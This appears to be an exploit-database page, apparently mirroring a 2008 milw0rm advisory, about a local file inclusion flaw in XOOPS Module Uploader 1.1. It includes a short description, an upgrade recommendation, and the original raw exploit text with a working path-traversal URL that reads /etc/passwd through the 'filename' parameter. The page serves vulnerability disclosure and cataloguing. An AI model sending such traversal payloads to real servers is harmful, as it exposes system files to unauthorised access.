header-logo
Suggest Exploit
vendor:
XOOPS Module Uploader
by:
MEEKAAH
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: XOOPS Module Uploader
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:xoops:xoops_module_uploader
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

XOOPS Module Uploader 1.1 – Local File Inclusion

XOOPS Module Uploader 1.1 is vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability to include local files on the server. This can be done by sending a specially crafted HTTP request to the vulnerable application. The attacker can include local files on the server by using the 'filename' parameter in the 'downloadfile' action. For example, an attacker can send a request to the vulnerable application as http://localhost/modules/uploader/index.php?action=downloadfile&filename=../../../../../../../../../../../../../../../../etc/passwd to include the '/etc/passwd' file on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.
Source

Exploit-DB raw data:

                                        MMM                                 MMM       
                                        MMM                                 MMM       
MMMMMMMMMMMMM    MMMMMMMMM  MMMMMMMMMM  MMMMMMMMM    MMMMMMMMM   MMMMMMMMM  MMMMMMMMM 
MM   MMM   MMM   MM         MMM         MMM    MMM  MMM    MMM  MMM    MMM  MMM    MMM
MM   MMM   MMM   MMMMMMM    MMMMMMMM    MMM    MMM  MMM    MMM  MMM    MMM  MMM    MMM
MM   MMM   MMM   MMMMMMM    MMMMMMMM    MMM MMMMM   MMMMMMMMMM  MMMMMMMMMM  MMM    MMM
MM   MMM   MMM   MM         MMM         MMM  MMMN   MMM    MMM  MMM    MMM  MMM    MMM
MM   MMM   MMM   MMMMMMMMM  MMMMMMMMMM  MMM   NMM   MMM    MMM  MMM    MMM  MMM    MMM


[*] Vulnerable : XOOPS Module Uploader 1.1 - Local File Inclusion
                 Module url : http://www.xoops.org/modules/repository/singlefile.php?cid=28&lid=1243

[*] Author     :  MEEKAAH

[*] Dork       :  Find it yourself ;)

[*] POC        :  http://localhost/modules/uploader/index.php?action=downloadfile&filename=[LFI]

[*] Example    :  http://localhost/modules/uploader/index.php?action=downloadfile&filename=../../../../../../../../../../../../../../../../etc/passwd

-----------------------------------------------------------------------------------------------------------

[*] Greetings  :  Alex, Adeel, CeBbZ, Cubacola, Noel ...

# milw0rm.com [2008-06-08]

Navigation

Suggest Exploit

Services By CQR